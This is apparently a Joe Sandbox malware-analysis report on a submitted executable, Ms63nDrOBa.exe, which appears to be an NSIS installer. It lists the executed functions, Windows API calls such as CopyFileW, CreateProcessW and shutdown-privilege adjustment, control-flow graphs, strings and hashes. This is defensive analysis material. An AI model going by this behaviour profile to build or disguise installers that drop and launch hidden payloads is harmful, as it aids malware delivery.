4430 4021c0 4429->4430 4431 402dab 21 API calls 4430->4431 4432 4021ca 4431->4432 4433 402dab 21 API calls 4432->4433 4434 4021d4 4433->4434 4435 402dab 21 API calls 4434->4435 4436 4021de 4435->4436 4437 40221d CoCreateInstance 4436->4437 4438 402dab 21 API calls 4436->4438 4441 40223c 4437->4441 4438->4437 4439 401423 28 API calls 4440 4022fb 4439->4440 4441->4439 4441->4440 4442 403fb4 4443 403fcc 4442->4443 4444 40412d 4442->4444 4443->4444 4445 403fd8 4443->4445 4446 40413e GetDlgItem GetDlgItem 4444->4446 4451 40417e 4444->4451 4448 403fe3 SetWindowPos 4445->4448 4449 403ff6 4445->4449 4450 4044b3 22 API calls 4446->4450 4447 4041d8 4452 4044ff SendMessageW 4447->4452 4460 404128 4447->4460 4448->4449 4453 404041 4449->4453 4454 403fff ShowWindow 4449->4454 4455 404168 SetClassLongW 4450->4455 4451->4447 4459 401389 2 API calls 4451->4459 4482 4041ea 4452->4482 4456 404060 4453->4456 4457 404049 DestroyWindow 4453->4457 4461 4040eb 4454->4461 4462 40401f GetWindowLongW 4454->4462 4458 40140b 2 API calls 4455->4458 4464 404065 SetWindowLongW 4456->4464 4465 404076 4456->4465 4463 40443c 4457->4463 4458->4451 4466 4041b0 4459->4466 4467 40451a 8 API calls 4461->4467 4462->4461 4468 404038 ShowWindow 4462->4468 4463->4460 4475 40446d ShowWindow 4463->4475 4464->4460 4465->4461 4469 404082 GetDlgItem 4465->4469 4466->4447 4470 4041b4 SendMessageW 4466->4470 4467->4460 4468->4453 4473 4040b0 4469->4473 4474 404093 SendMessageW IsWindowEnabled 4469->4474 4470->4460 4471 40140b 2 API calls 4471->4482 4472 40443e DestroyWindow EndDialog 4472->4463 4477 4040bd 4473->4477 4480 404104 SendMessageW 4473->4480 4481 4040d0 4473->4481 4487 4040b5 4473->4487 4474->4460 4474->4473 4475->4460 4476 406571 21 API calls 4476->4482 4477->4480 4477->4487 4478 40448c SendMessageW 4478->4461 4479 4044b3 22 API calls 4479->4482 4480->4461 4483 4040d8 4481->4483 4484 4040ed 4481->4484 4482->4460 4482->4471 4482->4472 4482->4476 4482->4479 4488 4044b3 22 API calls 4482->4488 4504 40437e DestroyWindow 4482->4504 4486 40140b 2 API calls 4483->4486 4485 40140b 2 API calls 4484->4485 4485->4487 4486->4487 4487->4461 4487->4478 4489 404265 GetDlgItem 4488->4489 4490 404282 ShowWindow EnableWindow 4489->4490 4491 40427a 4489->4491 4513 4044d5 EnableWindow 4490->4513 4491->4490 4493 4042ac EnableWindow 4498 4042c0 4493->4498 4494 4042c5 GetSystemMenu EnableMenuItem SendMessageW 4495 4042f5 SendMessageW 4494->4495 4494->4498 4495->4498 4497 403f95 22 API calls 4497->4498 4498->4494 4498->4497 4514 4044e8 SendMessageW 4498->4514 4515 406534 lstrcpynW 4498->4515 4500 404324 lstrlenW 4501 406571 21 API calls 4500->4501 4502 40433a SetWindowTextW 4501->4502 4503 401389 2 API calls 4502->4503 4503->4482 4504->4463 4505 404398 CreateDialogParamW 4504->4505 4505->4463 4506 4043cb 4505->4506 4507 4044b3 22 API calls 4506->4507 4508 4043d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4507->4508 4509 401389 2 API calls 4508->4509 4510 40441c 4509->4510 4510->4460 4511 404424 ShowWindow 4510->4511 4512 4044ff SendMessageW 4511->4512 4512->4463 4513->4493 4514->4498 4515->4500 4516 401a35 4517 402dab 21 API calls 4516->4517 4518 401a3e ExpandEnvironmentStringsW 4517->4518 4519 401a52 4518->4519 4521 401a65 4518->4521 4520 401a57 lstrcmpW 4519->4520 4519->4521 4520->4521 4527 4023b7 4528 4023c5 4527->4528 4529 4023bf 4527->4529 4531 402dab 21 API calls 4528->4531 4533 4023d3 4528->4533 4530 402dab 21 API calls 4529->4530 4530->4528 4531->4533 4532 4023e1 4535 402dab 21 API calls 4532->4535 4533->4532 4534 402dab 21 API calls 4533->4534 4534->4532 4536 4023ea WritePrivateProfileStringW 4535->4536 4537 4014b8 4538 4014be 4537->4538 4539 401389 2 API calls 4538->4539 4540 4014c6 4539->4540 4541 402439 4542 402441 4541->4542 4543 40246c 4541->4543 4544 402deb 21 API calls 4542->4544 4545 402dab 21 API calls 4543->4545 4547 402448 4544->4547 4546 402473 4545->4546 4552 402e69 4546->4552 4549 402480 4547->4549 4550 402dab 21 API calls 4547->4550 4551 402459 RegDeleteValueW RegCloseKey 4550->4551 4551->4549 4553 402e76 4552->4553 4554 402e7d 4552->4554 4553->4549 4554->4553 4556 402eae 4554->4556 4557 4063a1 RegOpenKeyExW 4556->4557 4558 402edc 4557->4558 4559 402eec RegEnumValueW 4558->4559 4566 402f0f 4558->4566 4567 402f86 4558->4567 4560 402f76 RegCloseKey 4559->4560 4559->4566 4560->4567 4561 402f4b RegEnumKeyW 4562 402f54 RegCloseKey 4561->4562 4561->4566 4563 406928 5 API calls 4562->4563 4565 402f64 4563->4565 4564 402eae 6 API calls 4564->4566 4565->4567 4568 402f68 RegDeleteKeyW 4565->4568 4566->4560 4566->4561 4566->4562 4566->4564 4567->4553 4568->4567 4569 40173a 4570 402dab 21 API calls 4569->4570 4571 401741 SearchPathW 4570->4571 4572 40175c 4571->4572 4573 401d3d 4574 402d89 21 API calls 4573->4574 4575 401d44 4574->4575 4576 402d89 21 API calls 4575->4576 4577 401d50 GetDlgItem 4576->4577 4578 40263d 4577->4578

                                                  Executed Functions

                                                  Function 0040350F Relevance: 82.7, APIs: 33, Strings: 14, Instructions: 464stringfilecomCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 40350f-403561 SetErrorMode GetVersionExW 1 403563-403593 GetVersionExW 0->1 2 40359b-4035a0 0->2 1->2 3 4035a2 2->3 4 4035a8-4035ea 2->4 3->4 5 4035ec-4035f4 call 406928 4->5 6 4035fd 4->6 5->6 12 4035f6 5->12 7 403602-403616 call 4068b8 lstrlenA 6->7 13 403618-403634 call 406928 * 3 7->13 12->6 20 403645-4036a9 #17 OleInitialize SHGetFileInfoW call 406534 GetCommandLineW call 406534 13->20 21 403636-40363c 13->21 28 4036b2-4036c6 call 405e30 CharNextW 20->28 29 4036ab-4036ad 20->29 21->20 26 40363e 21->26 26->20 32 4037c1-4037c7 28->32 29->28 33 4036cb-4036d1 32->33 34 4037cd 32->34 36 4036d3-4036d8 33->36 37 4036da-4036e1 33->37 35 4037e1-4037fb GetTempPathW call 4034de 34->35 44 403853-40386d DeleteFileW call 403082 35->44 45 4037fd-40381b GetWindowsDirectoryW lstrcatW call 4034de 35->45 36->36 36->37 39 4036e3-4036e8 37->39 40 4036e9-4036ed 37->40 39->40 42 4036f3-4036f9 40->42 43 4037ae-4037bd call 405e30 40->43 47 403713-40374c 42->47 48 4036fb-403702 42->48 43->32 61 4037bf-4037c0 43->61 66 403873-403879 44->66 67 403a5a-403a6a ExitProcess OleUninitialize 44->67 45->44 64 40381d-40384d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034de 45->64 51 403769-4037a3 47->51 52 40374e-403753 47->52 49 403704-403707 48->49 50 403709 48->50 49->47 49->50 50->47 58 4037a5-4037a9 51->58 59 4037ab-4037ad 51->59 52->51 56 403755-40375d 52->56 62 403764 56->62 63 40375f-403762 56->63 58->59 65 4037cf-4037dc call 406534 58->65 59->43 61->32 62->51 63->51 63->62 64->44 64->67 65->35 72 403912-403919 call 403c06 66->72 73 40387f-40388a call 405e30 66->73 70 403a90-403a96 67->70 71 403a6c-403a7c call 405b94 ExitProcess 67->71 75 403b14-403b1c 70->75 76 403a98-403aae GetCurrentProcess OpenProcessToken 70->76 83 40391e-403922 72->83 87 4038d8-4038e2 73->87 88 40388c-4038c1 73->88 84 403b22-403b26 ExitProcess 75->84 85 403b1e 75->85 81 403ab0-403ade LookupPrivilegeValueW AdjustTokenPrivileges 76->81 82 403ae4-403af2 call 406928 76->82 81->82 97 403b00-403b0b ExitWindowsEx 82->97 98 403af4-403afe 82->98 83->67 85->84 92 4038e4-4038f2 call 405f0b 87->92 93 403927-40394d call 405aff lstrlenW call 406534 87->93 90 4038c3-4038c7 88->90 94 4038d0-4038d4 90->94 95 4038c9-4038ce 90->95 92->67 107 4038f8-40390e call 406534 * 2 92->107 110 40395e-403976 93->110 111 40394f-403959 call 406534 93->111 94->90 100 4038d6 94->100 95->94 95->100 97->75 102 403b0d-403b0f call 40140b 97->102 98->97 98->102 100->87 102->75 107->72 114 40397b-40397f 110->114 111->110 116 403984-4039ae wsprintfW call 406571 114->116 120 4039b0-4039b5 call 405a88 116->120 121 4039b7 call 405ae2 116->121 125 4039bc-4039be 120->125 121->125 126 4039c0-4039ca GetFileAttributesW 125->126 127 4039fa-403a19 SetCurrentDirectoryW call 4062f4 CopyFileW 125->127 128 4039eb-4039f6 126->128 129 4039cc-4039d5 DeleteFileW 126->129 135 403a58 127->135 136 403a1b-403a3c call 4062f4 call 406571 call 405b17 127->136 128->114 132 4039f8 128->132 129->128 131 4039d7-4039e9 call 405c40 129->131 131->116 131->128 132->67 135->67 144 403a82-403a8e CloseHandle 136->144 145 403a3e-403a48 136->145 144->135 145->135 146 403a4a-403a52 call 406891 145->146 146->116 146->135
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403532
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040355D
                                                  • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403570
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403609
                                                  • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403646
                                                  • OleInitialize.OLE32(00000000), ref: 0040364D
                                                  • SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040366C
                                                  • GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403681
                                                  • CharNextW.USER32(00000000,007B3000,00000020,007B3000,00000000,?,00000008,0000000A,0000000C), ref: 004036BA
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037F2
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403803
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040380F
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403823
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040382B
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040383C
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403844
                                                  • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403858
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B3000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403931
                                                    • Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541
                                                  • wsprintfW.USER32 ref: 0040398E
                                                  • GetFileAttributesW.KERNEL32(007AB800,C:\Users\user\AppData\Local\Temp\), ref: 004039C1
                                                  • DeleteFileW.KERNEL32(007AB800), ref: 004039CD
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004039FB
                                                    • Part of subcall function 004062F4: MoveFileExW.KERNELBASE(?,?,00000005,00405DF2,?,00000000,000000F1,?,?,?,?,?), ref: 004062FE
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\Ms63nDrOBa.exe,007AB800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A11
                                                    • Part of subcall function 00405B17: CreateProcessW.KERNEL32(00000000,007AB800,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?,?,?,007AB800,?), ref: 00405B40
                                                    • Part of subcall function 00405B17: CloseHandle.KERNEL32(?,?,?,007AB800,?), ref: 00405B4D
                                                    • Part of subcall function 00406891: FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F54,007A3F50,007A3F50,00000000,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 0040689C
                                                    • Part of subcall function 00406891: FindClose.KERNEL32(00000000), ref: 004068A8
                                                  • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A5A
                                                  • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A5F
                                                  • ExitProcess.KERNEL32 ref: 00403A7C
                                                  • CloseHandle.KERNEL32(00000000,007AC000,007AC000,?,007AB800,00000000), ref: 00403A83
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A9F
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AA6
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ABB
                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403ADE
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B03
                                                  • ExitProcess.KERNEL32 ref: 00403B26
                                                    • Part of subcall function 00405AE2: CreateDirectoryW.KERNELBASE(?,00000000,00403502,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405AE8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nse5B61.tmp$C:\Users\user\Desktop$C:\Users\user\Desktop\Ms63nDrOBa.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                  • API String ID: 2017177436-724603151
                                                  • Opcode ID: 95031478cf7aca2761e13cc7a8c35f67bbb2b0b4fc0cb4fdcab670add076414d
                                                  • Instruction ID: 67d79b026de4563afcf96275ffa6c79ee12181f10d5245d5b23545884d7a86e1
                                                  • Opcode Fuzzy Hash: 95031478cf7aca2761e13cc7a8c35f67bbb2b0b4fc0cb4fdcab670add076414d
                                                  • Instruction Fuzzy Hash: FCF1F570604301ABD720AF659D05B6B7EE8EF81B06F10443EF581B62D1DB7D8A45CB6E
                                                  Function 00405C40 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 289 405c40-405c66 call 405f0b 292 405c68-405c7a DeleteFileW 289->292 293 405c7f-405c86 289->293 294 405dfc-405e00 292->294 295 405c88-405c8a 293->295 296 405c99-405ca9 call 406534 293->296 297 405c90-405c93 295->297 298 405daa-405daf 295->298 302 405cb8-405cb9 call 405e4f 296->302 303 405cab-405cb6 lstrcatW 296->303 297->296 297->298 298->294 301 405db1-405db4 298->301 304 405db6-405dbc 301->304 305 405dbe-405dc6 call 406891 301->305 306 405cbe-405cc2 302->306 303->306 304->294 305->294 312 405dc8-405ddc call 405e03 call 405bf8 305->312 310 405cc4-405ccc 306->310 311 405cce-405cd4 lstrcatW 306->311 310->311 313 405cd9-405cf5 lstrlenW FindFirstFileW 310->313 311->313 329 405df4-405df7 call 4055b9 312->329 330 405dde-405de1 312->330 314 405cfb-405d03 313->314 315 405d9f-405da3 313->315 317 405d23-405d37 call 406534 314->317 318 405d05-405d0d 314->318 315->298 320 405da5 315->320 331 405d39-405d41 317->331 332 405d4e-405d59 call 405bf8 317->332 321 405d82-405d92 FindNextFileW 318->321 322 405d0f-405d17 318->322 320->298 321->314 328 405d98-405d99 FindClose 321->328 322->317 325 405d19-405d21 322->325 325->317 325->321 328->315 329->294 330->304 333 405de3-405df2 call 4055b9 call 4062f4 330->333 331->321 334 405d43-405d4c call 405c40 331->334 342 405d7a-405d7d call 4055b9 332->342 343 405d5b-405d5e 332->343 333->294 334->321 342->321 346 405d60-405d70 call 4055b9 call 4062f4 343->346 347 405d72-405d78 343->347 346->321 347->321
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405C69
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse5B61.tmp\*.*,\*.*), ref: 00405CB1
                                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405CD4
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nse5B61.tmp\*.*,?,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CDA
                                                  • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nse5B61.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nse5B61.tmp\*.*,?,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405CEA
                                                  • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D8A
                                                  • FindClose.KERNEL32(00000000), ref: 00405D99
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nse5B61.tmp\*.*$\*.*
                                                  • API String ID: 2035342205-2642911601
                                                  • Opcode ID: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                                  • Instruction ID: 81bbe464494fb05f5b6ac6ef540245f59b5aaf372d852028a7707812675e6212
                                                  • Opcode Fuzzy Hash: 504f622c36c52388dc620547c7079f2cd4c31ca565287661d2c47a2285e6f56d
                                                  • Instruction Fuzzy Hash: 7C419230805A14B6DB216B658D4DBBF7678EF81714F10813FF841B11D1DB7C4A829E6E
                                                  Function 00406891 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,007A4798,007A3F50,00405F54,007A3F50,007A3F50,00000000,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 0040689C
                                                  • FindClose.KERNEL32(00000000), ref: 004068A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                                  • Instruction ID: e6b866c1dacf5e46d4e55f169e1c72a585861dd5ed209923aafe0abde5973ea2
                                                  • Opcode Fuzzy Hash: 66bf9994b2f5814cd2018ee22faa20966fcafcce3cd9b2dc1ade219dc7786d58
                                                  • Instruction Fuzzy Hash: 9BD012325161205BD29127386D0C85B7A9CAF563317129B36F46AF22E0C7748C628698
                                                  Function 00403C06 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215stringregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 149 403c06-403c1e call 406928 152 403c20-403c2b GetUserDefaultUILanguage call 40647b 149->152 153 403c32-403c69 call 406402 149->153 156 403c30 152->156 159 403c81-403c87 lstrcatW 153->159 160 403c6b-403c7c call 406402 153->160 158 403c8c-403cb5 call 403edc call 405f0b 156->158 166 403d47-403d4f call 405f0b 158->166 167 403cbb-403cc0 158->167 159->158 160->159 173 403d51-403d58 call 406571 166->173 174 403d5d-403d82 LoadImageW 166->174 167->166 169 403cc6-403cee call 406402 167->169 169->166 175 403cf0-403cf4 169->175 173->174 177 403e03-403e0b call 40140b 174->177 178 403d84-403db4 RegisterClassW 174->178 179 403d06-403d12 lstrlenW 175->179 180 403cf6-403d03 call 405e30 175->180 191 403e15-403e20 call 403edc 177->191 192 403e0d-403e10 177->192 181 403ed2 178->181 182 403dba-403dfe SystemParametersInfoW CreateWindowExW 178->182 186 403d14-403d22 lstrcmpiW 179->186 187 403d3a-403d42 call 405e03 call 406534 179->187 180->179 185 403ed4-403edb 181->185 182->177 186->187 190 403d24-403d2e GetFileAttributesW 186->190 187->166 194 403d30-403d32 190->194 195 403d34-403d35 call 405e4f 190->195 201 403e26-403e40 ShowWindow call 4068b8 191->201 202 403ea9-403eb1 call 40568c 191->202 192->185 194->187 194->195 195->187 207 403e42-403e47 call 4068b8 201->207 208 403e4c-403e5e GetClassInfoW 201->208 209 403eb3-403eb9 202->209 210 403ecb-403ecd call 40140b 202->210 207->208 213 403e60-403e70 GetClassInfoW RegisterClassW 208->213 214 403e76-403ea7 DialogBoxParamW call 40140b call 403b56 208->214 209->192 215 403ebf-403ec6 call 40140b 209->215 210->181 213->214 214->185 215->192
                                                  APIs
                                                    • Part of subcall function 00406928: GetModuleHandleA.KERNEL32(?,00000020,?,0040361F,0000000C,?,?,?,?,?,?,?,?), ref: 0040693A
                                                    • Part of subcall function 00406928: GetProcAddress.KERNEL32(00000000,?), ref: 00406955
                                                  • GetUserDefaultUILanguage.KERNELBASE(00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,007B3000,00008001), ref: 00403C20
                                                    • Part of subcall function 0040647B: wsprintfW.USER32 ref: 00406488
                                                  • lstrcatW.KERNEL32(1033,007A1748), ref: 00403C87
                                                  • lstrlenW.KERNEL32(007A6200,?,?,?,007A6200,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000,00000002,76233420), ref: 00403D07
                                                  • lstrcmpiW.KERNEL32(007A61F8,.exe,007A6200,?,?,?,007A6200,00000000,007B3800,1033,007A1748,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1748,00000000), ref: 00403D1A
                                                  • GetFileAttributesW.KERNEL32(007A6200), ref: 00403D25
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,007B3800), ref: 00403D6E
                                                  • RegisterClassW.USER32(007A7200), ref: 00403DAB
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DC3
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DF8
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403E2E
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,007A7200), ref: 00403E5A
                                                  • GetClassInfoW.USER32(00000000,RichEdit,007A7200), ref: 00403E67
                                                  • RegisterClassW.USER32(007A7200), ref: 00403E70
                                                  • DialogBoxParamW.USER32(?,00000000,00403FB4,00000000), ref: 00403E8F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 606308-2896555866
                                                  • Opcode ID: 77247c40459340d7e507679bbfe1089da7311cd67a308f54977d61676674234e
                                                  • Instruction ID: e3f36f251999893233d50a16806d3669fe4950a37a4839b1d492828efc6e8aed
